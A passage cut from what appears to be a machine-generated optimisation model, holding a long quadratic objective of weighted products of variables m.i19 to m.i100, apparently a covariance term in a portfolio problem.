m.i69 + 0.00763898*m.i19*m.i70 + 0.00304924*m.i19*m.i71 + 0.00746516*m.i19*m.i72 + 0.0073895*
m.i19*m.i73 + 0.008372*m.i19*m.i74 + 0.0096269*m.i19*m.i75 + 0.00403824*m.i19*m.i76 + 0.00896868*
m.i19*m.i77 + 0.00369816*m.i19*m.i78 + 0.01338638*m.i19*m.i79 + 0.00702566*m.i19*m.i80 +
0.00204776*m.i19*m.i81 + 0.0040369*m.i19*m.i82 - 0.00617474*m.i19*m.i83 + 0.00664876*m.i19*m.i84
+ 0.00640014*m.i19*m.i85 + 0.00537574*m.i19*m.i86 + 0.00744762*m.i19*m.i87 + 0.0288232*m.i19*
m.i88 + 0.0089059*m.i19*m.i89 + 0.00438344*m.i19*m.i90 + 0.01192674*m.i19*m.i91 + 0.00326376*
m.i19*m.i92 + 0.00330764*m.i19*m.i93 + 0.00649262*m.i19*m.i94 + 0.0076392*m.i19*m.i95 +
0.01075072*m.i19*m.i96 + 0.00749846*m.i19*m.i97 + 0.00563188*m.i19*m.i98 + 0.00430788*m.i19*m.i99
+ 0.00505074*m.i19*m.i100 + 0.026993*m.i20*m.i21 + 0.0407142*m.i20*m.i22 + 0.0262048*m.i20*m.i23
+ 0.0233804*m.i20*m.i24 + 0.01566388*m.i20*m.i25 + 0.01254316*m.i20*m.i26 + 0.0230746*m.i20*
m.i27 + 0.01228074*m.i20*m.i28 + 0.01141404*m.i20*m.i29 + 0.046979*m.i20*m.i30 + 0.01956928*m.i20
*m.i31 + 0.0444886*m.i20*m.i32 + 0.0345924*m.i20*m.i33 + 0.01450852*m.i20*m.i34 + 0.01607032*
m.i20*m.i35 + 0.0534276*m.i20*m.i36 + 0.027915*m.i20*m.i37 + 0.00446976*m.i20*m.i38 + 0.0310128*
m.i20*m.i39 + 0.0617194*m.i20*m.i40 + 0.0418284*m.i20*m.i41 + 0.0284554*m.i20*m.i42 + 0.0202322*
m.i20*m.i43 + 0.0309222*m.i20*m.i44 + 0.00850138*m.i20*m.i45 + 0.01226594*m.i20*m.i46 + 0.0355744
*m.i20*m.i47 + 0.01044628*m.i20*m.i48 + 0.0261968*m.i20*m.i49 + 0.0353182*m.i20*m.i50 +
0.01768812*m.i20*m.i51 + 0.0227266*m.i20*m.i52 + 0.0229416*m.i20*m.i53 + 0.0285392*m.i20*m.i54 +
0.024215*m.i20*m.i55 + 0.0227*m.i20*m.i56 + 0.01349126*m.i20*m.i57 + 0.01576804*m.i20*m.i58 +
0.0251472*m.i20*m.i59 + 0.00678918*m.i20*m.i60 + 0.0460104*m.i20*m.i61 + 0.0362612*m.i20*m.i62 +
0.0246576*m.i20*m.i63 + 0.01897386*m.i20*m.i64 + 0.021042*m.i20*m.i65 + 0.01449872*m.i20*m.i66 +
0.01901978*m.i20*m.i67 + 0.01289314*m.i20*m.i68 + 0.04318*m.i20*m.i69 + 0.0192612*m.i20*m.i70 +
0.0319956*m.i20*m.i71 + 0.0241418*m.i20*m.i72 + 0.0231068*m.i20*m.i73 + 0.0232748*m.i20*m.i74 +
0.01394672*m.i20*m.i75 + 0.01233534*m.i20*m.i76 + 0.0250086*m.i20*m.i77 + 0.01003866*m.i20*m.i78
+ 0.01782134*m.i20*m.i79 + 0.0175231*m.i20*m.i80 + 0.0266842*m.i20*m.i81 + 0.00899148*m.i20*
m.i82 + 0.01916166*m.i20*m.i83 + 0.0237898*m.i20*m.i84 + 0.01674726*m.i20*m.i85 + 0.0243836*m.i20
*m.i86 + 0.0205712*m.i20*m.i87 + 0.0526016*m.i20*m.i88 + 0.01299922*m.i20*m.i89 + 0.0223216*m.i20
*m.i90 + 0.0221722*m.i20*m.i91 + 0.0200512*m.i20*m.i92 + 0.00605128*m.i20*m.i93 + 0.01422172*
m.i20*m.i94 + 0.0209666*m.i20*m.i95 + 0.0316224*m.i20*m.i96 + 0.0278754*m.i20*m.i97 + 0.0266692*
m.i20*m.i98 + 0.032317*m.i20*m.i99 + 0.0372718*m.i20*m.i100 + 0.0225584*m.i21*m.i22 + 0.01330824*
m.i21*m.i23 + 0.01120138*m.i21*m.i24 + 0.00988644*m.i21*m.i25 + 0.0053562*m.i21*m.i26 +
0.01171726*m.i21*m.i27 + 0.0075308*m.i21*m.i28 + 0.0062293*m.i21*m.i29 + 0.028151*m.i21*m.i30 +
0.01116532*m.i21*m.i31 + 0.024731*m.i21*m.i32 + 0.01403094*m.i21*m.i33 + 0.0053378*m.i21*m.i34 +
0.0062169*m.i21*m.i35 + 0.0322338*m.i21*m.i36 + 0.0173092*m.i21*m.i37 + 0.00310282*m.i21*m.i38 +
0.01943686*m.i21*m.i39 + 0.0397312*m.i21*m.i40 + 0.0227668*m.i21*m.i41 + 0.01402322*m.i21*m.i42
+ 0.01184862*m.i21*m.i43 + 0.01574106*m.i21*m.i44 + 0.00351088*m.i21*m.i45 + 0.00692094*m.i21*
m.i46 + 0.01710158*m.i21*m.i47 + 0.00581758*m.i21*m.i48 + 0.013985*m.i21*m.i49 + 0.0205976*m.i21*
m.i50 + 0.01286968*m.i21*m.i51 + 0.01222018*m.i21*m.i52 + 0.01492284*m.i21*m.i53 + 0.01502328*
m.i21*m.i54 + 0.01279528*m.i21*m.i55 + 0.01443928*m.i21*m.i56 + 0.00711002*m.i21*m.i57 +
0.00897148*m.i21*m.i58 + 0.0175601*m.i21*m.i59 + 0.00366562*m.i21*m.i60 + 0.0240206*m.i21*m.i61
+ 0.01871124*m.i21*m.i62 + 0.01471548*m.i21*m.i63 + 0.00910326*m.i21*m.i64 + 0.01121548*m.i21*
m.i65 + 0.0093615*m.i21*m.i66 + 0.0129081*m.i21*m.i67 + 0.0055548*m.i21*m.i68 + 0.0214638*m.i21*
m.i69 + 0.00932128*m.i21*m.i70 + 0.01654162*m.i21*m.i71 + 0.01150414*m.i21*m.i72 + 0.01130758*
m.i21*m.i73 + 0.01195864*m.i21*m.i74 + 0.00685764*m.i21*m.i75 + 0.00673976*m.i21*m.i76 +
0.01092518*m.i21*m.i77 + 0.00610126*m.i21*m.i78 + 0.0166491*m.i21*m.i79 + 0.00973956*m.i21*m.i80
+ 0.01360816*m.i21*m.i81 + 0.00413938*m.i21*m.i82 + 0.01295166*m.i21*m.i83 + 0.01359658*m.i21*
m.i84 + 0.0100056*m.i21*m.i85 + 0.01591198*m.i21*m.i86 + 0.01302584*m.i21*m.i87 + 0.0321888*m.i21
*m.i88 + 0.0069057*m.i21*m.i89 + 0.01467542*m.i21*m.i90 + 0.0104985*m.i21*m.i91 + 0.01203108*
m.i21*m.i92 + 0.00438602*m.i21*m.i93 + 0.0064228*m.i21*m.i94 + 0.0109577*m.i21*m.i95 + 0.01683074
*m.i21*m.i96 + 0.01510662*m.i21*m.i97 + 0.013665*m.i21*m.i98 + 0.01994166*m.i21*m.i99 + 0.0184821
*m.i21*m.i100 + 0.01713984*m.i22*m.i23 + 0.0290628*m.i22*m.i24 + 0.01659484*m.i22*m.i25 +
0.01330504*m.i22*m.i26 + 0.0220338*m.i22*m.i27 + 0.0096401*m.i22*m.i28 + 0.01336178*m.i22*m.i29
+ 0.0794522*m.i22*m.i30 + 0.00912184*m.i22*m.i31 + 0.0466568*m.i22*m.i32 + 0.0203942*m.i22*m.i33
+ 0.00695226*m.i22*m.i34 + 0.0125215*m.i22*m.i35 + 0.0728992*m.i22*m.i36 + 0.0354588*m.i22*m.i37
+ 0.00691112*m.i22*m.i38 + 0.037201*m.i22*m.i39 + 0.0756082*m.i22*m.i40 + 0.0292772*m.i22*m.i41
+ 0.0266054*m.i22*m.i42 + 0.01269282*m.i22*m.i43 + 0.0230306*m.i22*m.i44 + 0.000804368*m.i22*
m.i45 + 0.01545384*m.i22*m.i46 + 0.0296748*m.i22*m.i47 + 0.0193381*m.i22*m.i48 + 0.0200644*m.i22*
m.i49 + 0.0450946*m.i22*m.i50 + 0.01567104*m.i22*m.i51 + 0.0202574*m.i22*m.i52 + 0.0456018*m.i22*
m.i53 + 0.024727*m.i22*m.i54 + 0.01871804*m.i22*m.i55 + 0.01574656*m.i22*m.i56 + 0.01426746*m.i22
*m.i57 + 0.0112117*m.i22*m.i58 + 0.0237092*m.i22*m.i59 + 0.01100176*m.i22*m.i60 + 0.0484136*m.i22
*m.i61 + 0.0477626*m.i22*m.i62 + 0.01715072*m.i22*m.i63 + 0.01569402*m.i22*m.i64 + 0.0163363*
m.i22*m.i65 + 0.00819194*m.i22*m.i66 + 0.0250362*m.i22*m.i67 + 0.01191736*m.i22*m.i68 + 0.0445474
*m.i22*m.i69 + 0.0208408*m.i22*m.i70 + 0.0196514*m.i22*m.i71 + 0.01993902*m.i22*m.i72 +
0.01317816*m.i22*m.i73 + 0.0290184*m.i22*m.i74 + 0.022028*m.i22*m.i75 + 0.01241074*m.i22*m.i76 +
0.01467528*m.i22*m.i77 + 0.0179883*m.i22*m.i78 + 0.040464*m.i22*m.i79 + 0.01646476*m.i22*m.i80 +
0.0251454*m.i22*m.i81 + 0.00665554*m.i22*m.i82 - 0.00094782*m.i22*m.i83 + 0.01809638*m.i22*m.i84
+ 0.01658492*m.i22*m.i85 + 0.0242392*m.i22*m.i86 + 0.0215874*m.i22*m.i87 + 0.0229098*m.i22*m.i88
+ 0.01114584*m.i22*m.i89 + 0.046945*m.i22*m.i90 + 0.0230318*m.i22*m.i91 + 0.01381346*m.i22*m.i92
+ 0.0100301*m.i22*m.i93 + 0.00837496*m.i22*m.i94 + 0.0250054*m.i22*m.i95 + 0.0620424*m.i22*m.i96
+ 0.0302296*m.i22*m.i97 + 0.0248336*m.i22*m.i98 + 0.0372288*m.i22*m.i99 + 0.0441042*m.i22*m.i100
+ 0.00618108*m.i23*m.i24 + 0.00567144*m.i23*m.i25 + 0.0048866*m.i23*m.i26 + 0.00839514*m.i23*
m.i27 + 0.00487436*m.i23*m.i28 + 0.004356*m.i23*m.i29 + 0.024299*m.i23*m.i30 + 0.00996842*m.i23*
m.i31 + 0.0204928*m.i23*m.i32 + 0.01726232*m.i23*m.i33 + 0.00564344*m.i23*m.i34 + 0.00506272*
m.i23*m.i35 + 0.027322*m.i23*m.i36 + 0.01648718*m.i23*m.i37 + 0.001813512*m.i23*m.i38 + 0.0143408
*m.i23*m.i39 + 0.0410642*m.i23*m.i40 + 0.00822668*m.i23*m.i41 + 0.01397884*m.i23*m.i42 +
0.00751294*m.i23*m.i43 + 0.01081252*m.i23*m.i44 + 0.00375058*m.i23*m.i45 + 0.00488444*m.i23*m.i46
+ 0.01210078*m.i23*m.i47 + 0.0050334*m.i23*m.i48 + 0.01042672*m.i23*m.i49 + 0.01834872*m.i23*
m.i50 + 0.0122672*m.i23*m.i51 + 0.01291522*m.i23*m.i52 + 0.01243908*m.i23*m.i53 + 0.01372984*
m.i23*m.i54 + 0.0114482*m.i23*m.i55 + 0.0105593*m.i23*m.i56 + 0.00644542*m.i23*m.i57 + 0.00648944
*m.i23*m.i58 + 0.01543002*m.i23*m.i59 + 0.0037869*m.i23*m.i60 + 0.0214726*m.i23*m.i61 +
0.01495998*m.i23*m.i62 + 0.00692592*m.i23*m.i63 + 0.00648514*m.i23*m.i64 + 0.00794602*m.i23*m.i65
+ 0.00558232*m.i23*m.i66 + 0.0093087*m.i23*m.i67 + 0.000819996*m.i23*m.i68 + 0.01512186*m.i23*
m.i69 + 0.0070338*m.i23*m.i70 + 0.00840292*m.i23*m.i71 + 0.00668858*m.i23*m.i72 + 0.00956292*
m.i23*m.i73 + 0.00972254*m.i23*m.i74 + 0.00409738*m.i23*m.i75 + 0.00544566*m.i23*m.i76 +
0.01207296*m.i23*m.i77 + 0.00561846*m.i23*m.i78 + 0.01639358*m.i23*m.i79 + 0.00769632*m.i23*m.i80
+ 0.01062502*m.i23*m.i81 + 0.0060578*m.i23*m.i82 + 0.00866906*m.i23*m.i83 + 0.00707332*m.i23*
m.i84 + 0.01006612*m.i23*m.i85 + 0.01147664*m.i23*m.i86 + 0.0127172*m.i23*m.i87 + 0.01718458*
m.i23*m.i88 + 0.00499896*m.i23*m.i89 + 0.01300446*m.i23*m.i90 + 0.00824348*m.i23*m.i91 +
0.01100222*m.i23*m.i92 + 0.00359882*m.i23*m.i93 + 0.00760194*m.i23*m.i94 + 0.01026304*m.i23*m.i95
+ 0.01748628*m.i23*m.i96 + 0.01222018*m.i23*m.i97 + 0.00656104*m.i23*m.i98 + 0.01929844*m.i23*
m.i99 + 0.01526792*m.i23*m.i100 + 0.01061256*m.i24*m.i25 + 0.00390748*m.i24*m.i26 + 0.0176534*
m.i24*m.i27 + 0.00973526*m.i24*m.i28 + 0.00580416*m.i24*m.i29 + 0.0308904*m.i24*m.i30 +
0.00564094*m.i24*m.i31 + 0.0202996*m.i24*m.i32 + 0.00846578*m.i24*m.i33 + 0.00878324*m.i24*m.i34
+ 0.0092725*m.i24*m.i35 + 0.0386418*m.i24*m.i36 + 0.01405906*m.i24*m.i37 + 0.0050169*m.i24*m.i38
+ 0.01753958*m.i24*m.i39 + 0.0277342*m.i24*m.i40 + 0.0200538*m.i24*m.i41 + 0.0160148*m.i24*m.i42
+ 0.01157484*m.i24*m.i43 + 0.0097945*m.i24*m.i44 + 0.00047637*m.i24*m.i45 + 0.0074696*m.i24*
m.i46 + 0.0232922*m.i24*m.i47 + 0.0064693*m.i24*m.i48 + 0.0076863*m.i24*m.i49 + 0.01970906*m.i24*
m.i50 + 0.00539232*m.i24*m.i51 + 0.01285448*m.i24*m.i52 + 0.0120141*m.i24*m.i53 + 0.0124346*m.i24
*m.i54 + 0.00898946*m.i24*m.i55 + 0.00726448*m.i24*m.i56 + 0.0065436*m.i24*m.i57 + 0.00501008*
m.i24*m.i58 + 0.01101314*m.i24*m.i59 + 0.00470396*m.i24*m.i60 + 0.0237074*m.i24*m.i61 + 0.0228986
*m.i24*m.i62 + 0.01228188*m.i24*m.i63 + 0.01100376*m.i24*m.i64 + 0.00915078*m.i24*m.i65 +
0.0069269*m.i24*m.i66 + 0.01206108*m.i24*m.i67 + 0.00908652*m.i24*m.i68 + 0.0217466*m.i24*m.i69
+ 0.00887002*m.i24*m.i70 + 0.022452*m.i24*m.i71 + 0.0139555*m.i24*m.i72 + 0.00715706*m.i24*m.i73
+ 0.01096546*m.i24*m.i74 + 0.00744888*m.i24*m.i75 + 0.0028668*m.i24*m.i76 + 0.0036177*m.i24*
m.i77 + 0.00580328*m.i24*m.i78 + 0.0086669*m.i24*m.i79 + 0.00929752*m.i24*m.i80 + 0.01854944*
m.i24*m.i81 + 0.0023229*m.i24*m.i82 + 0.01207648*m.i24*m.i83 + 0.01205652*m.i24*m.i84 + 0.0096674
*m.i24*m.i85 + 0.0108503*m.i24*m.i86 + 0.00597266*m.i24*m.i87 + 0.0190243*m.i24*m.i88 +
0.00640978*m.i24*m.i89 + 0.01034642*m.i24*m.i90 + 0.01193214*m.i24*m.i91 + 0.00822214*m.i24*m.i92
+ 0.00070224*m.i24*m.i93 + 0.00307244*m.i24*m.i94 + 0.01092084*m.i24*m.i95 + 0.0203774*m.i24*
m.i96 + 0.01743418*m.i24*m.i97 + 0.0232524*m.i24*m.i98 + 0.01437366*m.i24*m.i99 + 0.01998814*
m.i24*m.i100 + 0.00270846*m.i25*m.i26 + 0.00878244*m.i25*m.i27 + 0.00564506*m.i25*m.i28 +
0.00404084*m.i25*m.i29 + 0.0227806*m.i25*m.i30 + 0.00477484*m.i25*m.i31 + 0.016725*m.i25*m.i32 +
0.00496432*m.i25*m.i33 + 0.00361518*m.i25*m.i34 + 0.00462338*m.i25*m.i35 + 0.0204146*m.i25*m.i36
+ 0.01087624*m.i25*m.i37 + 0.00256388*m.i25*m.i38 + 0.01236456*m.i25*m.i39 + 0.01769162*m.i25*
m.i40 + 0.01576792*m.i25*m.i41 + 0.00928236*m.i25*m.i42 + 0.00793946*m.i25*m.i43 + 0.00966756*
m.i25*m.i44 + 0.00248138*m.i25*m.i45 + 0.00485932*m.i25*m.i46 + 0.0122764*m.i25*m.i47 + 0.0023089
*m.i25*m.i48 + 0.00859364*m.i25*m.i49 + 0.01421118*m.i25*m.i50 + 0.00733214*m.i25*m.i51 +
0.00816206*m.i25*m.i52 + 0.00960248*m.i25*m.i53 + 0.00866518*m.i25*m.i54 + 0.00692386*m.i25*m.i55
+ 0.00882586*m.i25*m.i56 + 0.00434948*m.i25*m.i57 + 0.0041589*m.i25*m.i58 + 0.01055232*m.i25*
m.i59 + 0.00330494*m.i25*m.i60 + 0.01561392*m.i25*m.i61 + 0.0126551*m.i25*m.i62 + 0.00815092*
m.i25*m.i63 + 0.00612506*m.i25*m.i64 + 0.0070869*m.i25*m.i65 + 0.00424002*m.i25*m.i66 +
0.00879504*m.i25*m.i67 + 0.0058829*m.i25*m.i68 + 0.01439048*m.i25*m.i69 + 0.00610238*m.i25*m.i70
+ 0.01131906*m.i25*m.i71 + 0.00889538*m.i25*m.i72 + 0.00612414*m.i25*m.i73 + 0.00846104*m.i25*
m.i74 + 0.0057198*m.i25*m.i75 + 0.00393476*m.i25*m.i76 + 0.00432972*m.i25*m.i77 + 0.00446968*
m.i25*m.i78 + 0.0141591*m.i25*m.i79 + 0.00681524*m.i25*m.i80 + 0.00839778*m.i25*m.i81 +
0.00242412*m.i25*m.i82 + 0.0061299*m.i25*m.i83 + 0.00821362*m.i25*m.i84 + 0.0059951*m.i25*m.i85
+ 0.01036166*m.i25*m.i86 + 0.0075501*m.i25*m.i87 + 0.0208316*m.i25*m.i88 + 0.00461656*m.i25*
m.i89 + 0.01024232*m.i25*m.i90 + 0.00541446*m.i25*m.i91 + 0.0058998*m.i25*m.i92 + 0.00419408*
m.i25*m.i93 + 0.0034525*m.i25*m.i94 + 0.00742618*m.i25*m.i95 + 0.01117296*m.i25*m.i96 +
0.00976304*m.i25*m.i97 + 0.01005714*m.i25*m.i98 + 0.00997578*m.i25*m.i99 + 0.01119052*m.i25*
m.i100 + 0.0054348*m.i26*m.i27 + 0.00158545*m.i26*m.i28 + 0.00507804*m.i26*m.i29 + 0.01115184*
m.i26*m.i30 + 0.00280118*m.i26*m.i31 + 0.0103351*m.i26*m.i32 + 0.00796856*m.i26*m.i33 +
0.00322344*m.i26*m.i34 + 0.00410686*m.i26*m.i35 + 0.00922294*m.i26*m.i36 + 0.00708292*m.i26*m.i37
+ 0.00218796*m.i26*m.i38 + 0.00667316*m.i26*m.i39 + 0.00604564*m.i26*m.i40 + 0.00774532*m.i26*
m.i41 + 0.00814596*m.i26*m.i42 + 0.0026451*m.i26*m.i43 + 0.00582206*m.i26*m.i44 + 0.00332382*
m.i26*m.i45 + 0.00451686*m.i26*m.i46 + 0.00733916*m.i26*m.i47 + 0.00476946*m.i26*m.i48 +
0.00485772*m.i26*m.i49 + 0.0100103*m.i26*m.i50 + 0.00280844*m.i26*m.i51 + 0.00687248*m.i26*m.i52
+ 0.00732458*m.i26*m.i53 + 0.00815206*m.i26*m.i54 + 0.00612236*m.i26*m.i55 + 0.00307146*m.i26*
m.i56 + 0.0049056*m.i26*m.i57 + 0.00412472*m.i26*m.i58 + 0.0040935*m.i26*m.i59 + 0.0040596*m.i26*
m.i60 + 0.01138906*m.i26*m.i61 + 0.00976836*m.i26*m.i62 + 0.0087752*m.i26*m.i63 + 0.00574374*
m.i26*m.i64 + 0.00539202*m.i26*m.i65 + 0.0020772*m.i26*m.i66 + 0.00535872*m.i26*m.i67 + 0.0041987
*m.i26*m.i68 + 0.00941624*m.i26*m.i69 + 0.00708368*m.i26*m.i70 + 0.00623148*m.i26*m.i71 +
0.0059506*m.i26*m.i72 + 0.00509138*m.i26*m.i73 + 0.00640786*m.i26*m.i74 + 0.00599214*m.i26*m.i75
+ 0.00535234*m.i26*m.i76 + 0.0061449*m.i26*m.i77 + 0.0049639*m.i26*m.i78 + 0.00212662*m.i26*
m.i79 + 0.00709762*m.i26*m.i80 + 0.00556936*m.i26*m.i81 + 0.0033022*m.i26*m.i82 - 0.0001706112*
m.i26*m.i83 + 0.0042184*m.i26*m.i84 + 0.00533878*m.i26*m.i85 + 0.00407216*m.i26*m.i86 + 0.0050287
*m.i26*m.i87 + 0.00492458*m.i26*m.i88 + 0.00236614*m.i26*m.i89 + 0.0069424*m.i26*m.i90 +
0.00767098*m.i26*m.i91 + 0.00534286*m.i26*m.i92 + 0.001624812*m.i26*m.i93 + 0.00309366*m.i26*
m.i94 + 0.00617648*m.i26*m.i95 + 0.01108742*m.i26*m.i96 + 0.0068572*m.i26*m.i97 + 0.00411952*
m.i26*m.i98 + 0.00653102*m.i26*m.i99 + 0.00944332*m.i26*m.i100 + 0.01236278*m.i27*m.i28 +
0.00615174*m.i27*m.i29 + 0.0284656*m.i27*m.i30 + 0.00531366*m.i27*m.i31 + 0.0227234*m.i27*m.i32
+ 0.01239532*m.i27*m.i33 + 0.00873604*m.i27*m.i34 + 0.01006162*m.i27*m.i35 + 0.0244272*m.i27*
m.i36 + 0.01206064*m.i27*m.i37 + 0.00764146*m.i27*m.i38 + 0.01638042*m.i27*m.i39 + 0.0281728*
m.i27*m.i40 + 0.0236864*m.i27*m.i41 + 0.01394576*m.i27*m.i42 + 0.01151236*m.i27*m.i43 +
0.00967762*m.i27*m.i44 + 0.0001345884*m.i27*m.i45 + 0.00656542*m.i27*m.i46 + 0.0226088*m.i27*
m.i47 + 0.00665866*m.i27*m.i48 + 0.00867994*m.i27*m.i49 + 0.01519986*m.i27*m.i50 + 0.00516678*
m.i27*m.i51 + 0.01290734*m.i27*m.i52 + 0.00750112*m.i27*m.i53 + 0.015481*m.i27*m.i54 + 0.00918208
*m.i27*m.i55 + 0.01133662*m.i27*m.i56 + 0.00655584*m.i27*m.i57 + 0.00645326*m.i27*m.i58 +
0.01022706*m.i27*m.i59 + 0.00655942*m.i27*m.i60 + 0.0230718*m.i27*m.i61 + 0.0200196*m.i27*m.i62
+ 0.01214952*m.i27*m.i63 + 0.00996324*m.i27*m.i64 + 0.00982212*m.i27*m.i65 + 0.00606814*m.i27*
m.i66 + 0.00854006*m.i27*m.i67 + 0.00819936*m.i27*m.i68 + 0.01608286*m.i27*m.i69 + 0.00821942*
m.i27*m.i70 + 0.0230626*m.i27*m.i71 + 0.01648106*m.i27*m.i72 + 0.00833058*m.i27*m.i73 + 0.0119455
*m.i27*m.i74 + 0.0073591*m.i27*m.i75 + 0.00553444*m.i27*m.i76 + 0.00629646*m.i27*m.i77 +
0.00406434*m.i27*m.i78 + 0.00760068*m.i27*m.i79 + 0.00662478*m.i27*m.i80 + 0.0198678*m.i27*m.i81
+ 0.0044671*m.i27*m.i82 + 0.01205228*m.i27*m.i83 + 0.0106948*m.i27*m.i84 + 0.00763694*m.i27*
m.i85 + 0.01122432*m.i27*m.i86 + 0.00899094*m.i27*m.i87 + 0.0237458*m.i27*m.i88 + 0.00548044*
m.i27*m.i89 + 0.01135562*m.i27*m.i90 + 0.01131762*m.i27*m.i91 + 0.00767916*m.i27*m.i92 +
0.00281062*m.i27*m.i93 + 0.00450634*m.i27*m.i94 + 0.01029564*m.i27*m.i95 + 0.01573164*m.i27*m.i96
+ 0.01494338*m.i27*m.i97 + 0.01900252*m.i27*m.i98 + 0.01470772*m.i27*m.i99 + 0.01866828*m.i27*
m.i100 + 0.00362518*m.i28*m.i29 + 0.01640256*m.i28*m.i30 + 0.00349192*m.i28*m.i31 + 0.0129237*
m.i28*m.i32 + 0.00538584*m.i28*m.i33 + 0.00533474*m.i28*m.i34 + 0.00643216*m.i28*m.i35 +
0.01292206*m.i28*m.i36 + 0.00798078*m.i28*m.i37 + 0.0054977*m.i28*m.i38 + 0.00885966*m.i28*m.i39
+ 0.016828*m.i28*m.i40 + 0.01167374*m.i28*m.i41 + 0.00549216*m.i28*m.i42 + 0.00692364*m.i28*
m.i43 + 0.00370672*m.i28*m.i44 + 0.000284348*m.i28*m.i45 + 0.00277668*m.i28*m.i46 + 0.00936392*
m.i28*m.i47 + 0.00267238*m.i28*m.i48 + 0.00522892*m.i28*m.i49 + 0.00779258*m.i28*m.i50 +
0.0043462*m.i28*m.i51 + 0.00591302*m.i28*m.i52 + 0.00320368*m.i28*m.i53 + 0.00698682*m.i28*m.i54
+ 0.00560018*m.i28*m.i55 + 0.0075828*m.i28*m.i56 + 0.00361162*m.i28*m.i57 + 0.00229658*m.i28*
m.i58 + 0.00780328*m.i28*m.i59 + 0.0033416*m.i28*m.i60 + 0.01168298*m.i28*m.i61 + 0.0082366*m.i28
*m.i62 + 0.00465746*m.i28*m.i63 + 0.00328332*m.i28*m.i64 + 0.00685966*m.i28*m.i65 + 0.00386632*
m.i28*m.i66 + 0.0053142*m.i28*m.i67 + 0.00432904*m.i28*m.i68 + 0.00791276*m.i28*m.i69 + 0.0040137
*m.i28*m.i70 + 0.01081358*m.i28*m.i71 + 0.00841874*m.i28*m.i72 + 0.00534694*m.i28*m.i73 +
0.00677544*m.i28*m.i74 + 0.00391198*m.i28*m.i75 + 0.00308942*m.i28*m.i76 + 0.00250778*m.i28*m.i77
+ 0.00189916*m.i28*m.i78 + 0.00856184*m.i28*m.i79 + 0.00337182*m.i28*m.i80 + 0.00959416*m.i28*
m.i81 + 0.00329038*m.i28*m.i82 + 0.00388664*m.i28*m.i83 + 0.00685968*m.i28*m.i84 + 0.00406002*
m.i28*m.i85 + 0.00658126*m.i28*m.i86 + 0.00646838*m.i28*m.i87 + 0.0218548*m.i28*m.i88 +
0.00541992*m.i28*m.i89 + 0.00503116*m.i28*m.i90 + 0.00418236*m.i28*m.i91 + 0.0040874*m.i28*m.i92
+ 0.0022624*m.i28*m.i93 + 0.00392254*m.i28*m.i94 + 0.00482686*m.i28*m.i95 + 0.00726382*m.i28*
m.i96 + 0.00767472*m.i28*m.i97 + 0.01066418*m.i28*m.i98 + 0.00883358*m.i28*m.i99 + 0.0070211*
m.i28*m.i100 + 0.0147917*m.i29*m.i30 + 0.001068816*m.i29*m.i31 + 0.0105712*m.i29*m.i32 +
0.00407766*m.i29*m.i33 + 0.00300076*m.i29*m.i34 + 0.00524794*m.i29*m.i35 + 0.01016322*m.i29*m.i36
+ 0.00841674*m.i29*m.i37 + 0.00258632*m.i29*m.i38 + 0.00698836*m.i29*m.i39 + 0.01223674*m.i29*
m.i40 + 0.01128912*m.i29*m.i41 + 0.00481604*m.i29*m.i42 + 0.00316394*m.i29*m.i43 + 0.00690116*
m.i29*m.i44 + 0.00082418*m.i29*m.i45 + 0.00343988*m.i29*m.i46 + 0.00660586*m.i29*m.i47 +
0.00315994*m.i29*m.i48 + 0.004109*m.i29*m.i49 + 0.01072766*m.i29*m.i50 + 0.00295018*m.i29*m.i51
+ 0.00574084*m.i29*m.i52 + 0.00735384*m.i29*m.i53 + 0.00646518*m.i29*m.i54 + 0.00437712*m.i29*
m.i55 + 0.0050201*m.i29*m.i56 + 0.00428602*m.i29*m.i57 + 0.00339284*m.i29*m.i58 + 0.00395186*
m.i29*m.i59 + 0.00369852*m.i29*m.i60 + 0.01069104*m.i29*m.i61 + 0.00877524*m.i29*m.i62 +
0.00780122*m.i29*m.i63 + 0.00319846*m.i29*m.i64 + 0.00522668*m.i29*m.i65 + 0.00318906*m.i29*m.i66
+ 0.00765554*m.i29*m.i67 + 0.00353436*m.i29*m.i68 + 0.0090668*m.i29*m.i69 + 0.0062235*m.i29*
m.i70 + 0.00879038*m.i29*m.i71 + 0.00661754*m.i29*m.i72 + 0.00355728*m.i29*m.i73 + 0.0041974*
m.i29*m.i74 + 0.00530048*m.i29*m.i75 + 0.00543652*m.i29*m.i76 + 0.00436164*m.i29*m.i77 +
0.00450742*m.i29*m.i78 + 0.00725294*m.i29*m.i79 + 0.00491692*m.i29*m.i80 + 0.00689594*m.i29*m.i81
+ 0.00288614*m.i29*m.i82 + 0.005327*m.i29*m.i83 + 0.00356482*m.i29*m.i84 + 0.00320232*m.i29*
m.i85 + 0.00401206*m.i29*m.i86 + 0.00746968*m.i29*m.i87 + 0.01484586*m.i29*m.i88 + 0.00405332*
m.i29*m.i89 + 0.00646554*m.i29*m.i90 + 0.00398186*m.i29*m.i91 + 0.0045419*m.i29*m.i92 +
0.00249602*m.i29*m.i93 + 0.00344506*m.i29*m.i94 + 0.0046313*m.i29*m.i95 + 0.01012898*m.i29*m.i96
+ 0.00666118*m.i29*m.i97 + 0.00510452*m.i29*m.i98 + 0.00865974*m.i29*m.i99 + 0.00556162*m.i29*
m.i100 + 0.01432038*m.i30*m.i31 + 0.048762*m.i30*m.i32 + 0.03246*m.i30*m.i33 + 0.00510162*m.i30*
m.i34 + 0.00990812*m.i30*m.i35 + 0.0782504*m.i30*m.i36 + 0.0336068*m.i30*m.i37 + 0.00740496*m.i30
*m.i38 + 0.0520556*m.i30*m.i39 + 0.0689666*m.i30*m.i40 + 0.0338084*m.i30*m.i41 + 0.0303886*m.i30*
m.i42 + 0.01530392*m.i30*m.i43 + 0.0286584*m.i30*m.i44 + 0.001838718*m.i30*m.i45 + 0.01735792*
m.i30*m.i46 + 0.0257124*m.i30*m.i47 + 0.01952576*m.i30*m.i48 + 0.0285968*m.i30*m.i49 + 0.0597966*
m.i30*m.i50 + 0.0235442*m.i30*m.i51 + 0.0356002*m.i30*m.i52 + 0.056815*m.i30*m.i53 + 0.031993*
m.i30*m.i54 + 0.0256864*m.i30*m.i55 + 0.012682*m.i30*m.i56 + 0.01927838*m.i30*m.i57 + 0.0132181*
m.i30*m.i58 + 0.0308396*m.i30*m.i59 + 0.01646776*m.i30*m.i60 + 0.0691402*m.i30*m.i61 + 0.0539688*
m.i30*m.i62 + 0.0253122*m.i30*m.i63 + 0.0217306*m.i30*m.i64 + 0.0238236*m.i30*m.i65 + 0.01199066*
m.i30*m.i66 + 0.0301278*m.i30*m.i67 + 0.0209952*m.i30*m.i68 + 0.0484514*m.i30*m.i69 + 0.0226726*
